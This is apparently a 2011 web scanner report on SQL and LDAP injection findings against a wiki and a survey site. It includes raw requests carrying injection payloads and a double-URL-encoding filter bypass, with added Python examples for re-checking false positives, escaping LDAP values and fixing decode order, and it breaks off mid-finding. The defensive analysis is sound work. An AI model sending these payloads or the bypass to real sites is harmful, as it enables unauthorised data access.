Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcJoGo+pEYs0Y; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:35 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 55738
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:05:04 GMT
Server: Apache
Set-Cookie: wab=joinButton=42; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTvX0KyUR4o0L; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=7F135B88425F21547100B4AF05FFCEA6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:04 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42059
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
Request 2
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:04 GMT Server: Apache Set-Cookie: wab=joinButton=58; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTpTEoGUg3f3M; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:04 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
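The note above asks for a manual re-check of the reported pair. The following added example (not code from the report or from the scanned site) does that re-check mechanically: it parses two raw responses, lists which headers differ, and then compares them again with the fields this application regenerates on every request masked out. The two responses are constructed from the headers shown in Response 1 and Response 2 above, with the bodies shortened to the title line; the choice of which headers and body tokens count as volatile is an assumption drawn from what varies between that pair.

```python
"""Re-check a difference-based injection finding with volatile response fields masked.

Added example; not part of the scan report. The two responses are constructed
from the headers the report shows for the first WPC-action finding, with the
bodies shortened to the <title>. Which headers count as volatile is an
assumption about this application, taken from what varies between the pair.
"""
from __future__ import annotations

import re

# Constructed from Response 1 / Response 2 of the WPC-action finding (bodies shortened).
RESPONSE_1 = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 05 Feb 2011 16:05:04 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: wab=joinButton=42; Domain=htcwiki.wetpaint.com; Path=/\r\n"
    "Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTvX0KyUR4o0L; Path=/\r\n"
    "Set-Cookie: JSESSIONID=7F135B88425F21547100B4AF05FFCEA6; Path=/\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "Content-Length: 42059\r\n"
    "\r\n"
    "<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>"
)
RESPONSE_2 = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sat, 05 Feb 2011 16:05:04 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: wab=joinButton=58; Domain=htcwiki.wetpaint.com; Path=/\r\n"
    "Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTpTEoGUg3f3M; Path=/\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "Content-Length: 42058\r\n"
    "\r\n"
    "<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>"
)

# Headers this application regenerates on every request (assumption drawn from the pair above).
# Content-Length is dropped because the body itself is compared, byte for byte.
VOLATILE_HEADERS = {"date", "expires", "set-cookie", "content-length"}
# Body tokens that also change per request and must not count as a "difference".
BODY_MASKS = [
    (re.compile(r"JSESSIONID=[0-9A-Fa-f]+"), "JSESSIONID=<masked>"),
    (re.compile(r"joinButton=\d+"), "joinButton=<masked>"),
]


def parse_response(raw: str) -> tuple[str, dict[str, list[str]], str]:
    """Split a raw HTTP response into (status line, header name -> values, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def differing_headers(a: str, b: str) -> set[str]:
    """Names of headers whose (multi)values differ between two responses."""
    _, ha, _ = parse_response(a)
    _, hb, _ = parse_response(b)
    return {n for n in ha.keys() | hb.keys() if sorted(ha.get(n, [])) != sorted(hb.get(n, []))}


def stable_view(raw: str) -> tuple[str, tuple[tuple[str, tuple[str, ...]], ...], str]:
    """The response with volatile headers dropped and per-request body tokens masked."""
    status, headers, body = parse_response(raw)
    kept = tuple(sorted((n, tuple(sorted(v))) for n, v in headers.items() if n not in VOLATILE_HEADERS))
    for pattern, replacement in BODY_MASKS:
        body = pattern.sub(replacement, body)
    return status, kept, body


def raw_differs(a: str, b: str) -> bool:
    """What a naive byte-for-byte comparison (the scanner's trigger) reports."""
    return a != b


def meaningful_difference(a: str, b: str) -> bool:
    """True only if the responses still differ once volatile material is masked."""
    return stable_view(a) != stable_view(b)


if __name__ == "__main__":
    print("naive comparison says different:", raw_differs(RESPONSE_1, RESPONSE_2))
    print("headers that differ:", sorted(differing_headers(RESPONSE_1, RESPONSE_2)))
    print("difference survives masking:", meaningful_difference(RESPONSE_1, RESPONSE_2))
```

For the constructed pair the naive comparison reports a difference, `differing_headers` names only Set-Cookie and Content-Length, and `meaningful_difference` is False. In a real re-test feed it the full bodies rather than the truncated excerpts, and run the benign baseline value through the same pair before concluding anything: if two identical baseline requests also "differ", the finding is explained by volatility, not by the injected condition.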
The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 18609109'%20or%201%3d1--%20 and 18609109'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In the excerpts below both responses are 200 OK with the same title and differ only in the re-issued wetst token, a JSESSIONID set on the first request only, and one byte of Content-Length (42059 versus 42058). Those are the same two lengths the WPC-action test against this page produced above with a different cookie and different payloads, which shows the one-byte change is independent of what was injected; treat this as a probable false positive until a masked comparison still shows a difference.
Request 1
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:58 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKnX33iuXhXee; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=AE20ED40A75BF632BC7ED48CB3C37C04; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:58 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42059
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
Request 2
GET /page/reset+password+for+my+cingular+8125 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r18609109'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:05:59 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TDf/d4BLFVKmXQVXoFXMNs; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:59 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 42058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>
<meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here Content-Length is identical (40934) in both responses and the excerpts differ only in the per-request Set-Cookie values (wab=joinButton 24 versus 95, a re-issued wetst token, and a JSESSIONID set on the first request only), so the "different responses" verdict rests on volatile cookies rather than on query behaviour; treat this as a probable false positive pending a comparison with those fields masked.
Request 1
GET /page/t8282+operating+system HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:44 GMT Server: Apache Set-Cookie: wab=joinButton=24; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRlTemit3XzC9; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=E29016370988C60F1E3EEBA8BAB0725D; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 40934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>t8282 operating system - HTC Smartphone Wiki</title>
<meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<script type="text/javascript"> //<![CDATA[ var global_inits = {"N ...[SNIP]...
Request 2
GET /page/t8282+operating+system HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:44 GMT Server: Apache Set-Cookie: wab=joinButton=95; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:03:44 GMT; Path=/ P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RwOfZSdTXsRr9r2MjsGHTx; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:44 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 40934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>t8282 operating system - HTC Smartphone Wiki</title>
<meta name="keywords" content="t8282 operating system - HTC Smartphone Wiki, htc t8282 windows mobile" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and that error was replaced by a different one. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In the evidence below the first "error message" is an IIS 403.1 "Execute access is denied" page, a web-server permission error rather than a database error, and the two-quote request returned 400 Bad Request rather than a normal page; neither response contains any SQL error text, so this instance is unconfirmed.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. This inference rests on the same 403/400 pair; before reporting it as a bypass, compare the single-encoded (%27) and double-encoded (%2527) requests side by side and check that the double-encoded one reaches the application at all.
Remediation detail
The web server will already have URL-decoded the path once, so the application almost certainly does not need to decode the value of REST URL parameter 1 a second time. If a further decode or other custom canonicalisation is genuinely required, perform it first and validate the canonical value afterwards; validating before the final decode is exactly what lets %2527 slip past a check for the ' character.
Request 1
GET /tc%2527/CreateLog.aspx HTTP/1.1 Host: web.survey-poll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 403 Forbidden Content-Length: 1758 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 16:29:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be displayed</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; ...[SNIP]... <h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br> ...[SNIP]...
Request 2
GET /tc%2527%2527/CreateLog.aspx HTTP/1.1 Host: web.survey-poll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 400 Bad Request Connection: close Date: Sat, 05 Feb 2011 16:29:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html
<html><body>Bad Request</body></html>
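To make the ordering problem in the remediation detail concrete, here is an added example (not code from the report or from the scanned application) with two hypothetical handlers standing in for whatever sits behind REST URL parameter 1. Both receive the path segment after the web server's single decode, so a client that sent tc%2527 hands them tc%27. The first validates and then decodes again, which is the bypass; the second canonicalises first and validates the result. The handler names, the blocklist and the input values are assumptions.

```python
"""Double URL-decoding bypass of a character blocklist, and the canonicalise-then-validate fix.

Added example; not code from the report. The handlers are hypothetical stand-ins
for the application behind REST URL parameter 1: the web server has already
decoded the path once, so they receive tc%27 when the client sent tc%2527.
"""
from urllib.parse import unquote

# Characters the hypothetical application tries to keep out of SQL. A blocklist is
# kept here only to show the ordering bug; an allow-list is the better validator.
BLOCKED = set("'\";")


def contains_blocked(value: str) -> bool:
    """True if any blocklisted character is present."""
    return any(ch in BLOCKED for ch in value)


def canonicalise(value: str, max_rounds: int = 3) -> str:
    """Decode until the value stops changing, so validation sees the final form.

    Input that is still changing after max_rounds is nested too deeply to be
    legitimate and is rejected outright.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("input still changing after repeated decoding; rejected")


def vulnerable_handler(segment_after_server_decode: str) -> str:
    """Validates, then decodes again: the order that lets %2527 through."""
    if contains_blocked(segment_after_server_decode):
        return "blocked"
    used = unquote(segment_after_server_decode)  # second decode: %27 -> '
    return f"USE:{used}"


def fixed_handler(segment_after_server_decode: str) -> str:
    """Canonicalise once, then validate the canonical value."""
    try:
        canonical = canonicalise(segment_after_server_decode)
    except ValueError:
        return "blocked"
    if contains_blocked(canonical):
        return "blocked"
    return f"USE:{canonical}"


if __name__ == "__main__":
    for segment in ("tc", "tc'", "tc%27"):
        print(f"{segment!r}: vulnerable={vulnerable_handler(segment)} fixed={fixed_handler(segment)}")
```

The vulnerable handler lets tc%27 through and ends up using tc' while blocking a plain tc', which is precisely the pattern the scanner reported; the fixed handler blocks both. If the application truly has no reason to decode a second time, the simplest fix is to delete that decode rather than to add canonicalisation around it.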
2. LDAP injection
There are 8 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = \ and whitespace. Where a free-form value genuinely has to appear in a search filter, escape it as the filter syntax (RFC 4515) requires, encoding \ * ( ) and NUL as \5c \2a \28 \29 and \00 respectively, so that the value can never close or open an assertion.
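The following added example (not code from the report or from the scanned site) shows both remediation options side by side and what the first payload from the instances below does to an unescaped filter. The filter shape, a conjunctive lookup on a hypothetical sessionToken attribute, is an assumption chosen so that the payload *)(sn=* lands inside an AND as the report's "conjunctive" wording describes.

```python
"""Allow-list validation and RFC 4515 escaping for user data placed in LDAP filters.

Added example; not code from the report or the scanned application. The filter
shape (a conjunctive lookup on a hypothetical sessionToken attribute) is an
assumption chosen to show what the report's payload *)(sn=* does to a filter.
"""
import re

# Short alphanumeric tokens only, as the remediation text recommends.
_ALLOWED_TOKEN = re.compile(r"[A-Za-z0-9]{1,64}")

# RFC 4515 section 3: these characters must be escaped as \XX inside an assertion value.
_RFC4515_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Matches the start of an attribute assertion such as "(sn=" or "(uid>=" so a
# filter's shape can be checked; a changed count means the input added structure.
_ASSERTION = re.compile(r"\([A-Za-z][A-Za-z0-9.;-]*(?:[~<>:]?=)")


def validate_token(value: str) -> str:
    """Reject anything outside the allow-list; returns the value unchanged when it passes."""
    if not _ALLOWED_TOKEN.fullmatch(value):
        raise ValueError("token rejected: must be 1-64 alphanumeric characters")
    return value


def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter (RFC 4515)."""
    return "".join(_RFC4515_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(token: str) -> str:
    """Raw interpolation: the pattern the finding describes."""
    return f"(&(objectClass=person)(sessionToken={token}))"


def build_filter_safe(token: str) -> str:
    """Escape first, so the value can never close or open an assertion."""
    return f"(&(objectClass=person)(sessionToken={escape_filter_value(token)}))"


def assertion_count(ldap_filter: str) -> int:
    """Number of attribute assertions in a filter."""
    return len(_ASSERTION.findall(ldap_filter))


if __name__ == "__main__":
    payload = "*)(sn=*"  # first payload of the pair the scanner sent
    # Unsafe: (&(objectClass=person)(sessionToken=*)(sn=*)) -> three assertions, and
    # sessionToken=* matches every entry. The scanner's second payload *)!(sn=* yields
    # a bare "!" outside parentheses, which a filter parser rejects; that parse/no-parse
    # split is what the difference-based test looks for.
    print(build_filter_unsafe(payload), assertion_count(build_filter_unsafe(payload)))
    # Safe: (&(objectClass=person)(sessionToken=\2a\29\28sn=\2a)) -> still two assertions.
    print(build_filter_safe(payload), assertion_count(build_filter_safe(payload)))
```

Prefer `validate_token` wherever the value is an identifier, as the wetst token appears to be; reserve escaping for values that legitimately contain other characters, and in production use the escaper your LDAP library ships (for example `ldap3.utils.conv.escape_filter_chars` or python-ldap's `ldap.filter.escape_filter_chars`) rather than a hand-rolled table.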
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner. The first payload would close the assertion it lands in and append (sn=*) inside an AND filter; the second inserts a bare ! that a filter parser rejects, which is why the scanner expects the pair to behave differently. In the excerpts below both responses are 200 OK with the same title, and the only differences are the re-issued wetst and JSESSIONID cookies and one byte of Content-Length (43249 versus 43248), the same pattern the SQL injection tests on this cookie produced above, so this is more likely session-token volatility than filter evaluation; treat it as a probable false positive until a comparison with those fields masked still shows a difference.
Request 1
GET /page/HTC+ALPINE HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:02:25 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1R/ygmgSHYZPKI20TtYbsJm; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=E58B38A7E034A4FD9D63E96B232CD545; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:02:25 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 43249
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>HTC Alpine - HTC Smartphone Wiki</title>
<meta name="keywords" content="HTC Alpine - HTC Smartphone Wiki, Alpine,phone specs" /> <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
Request 2
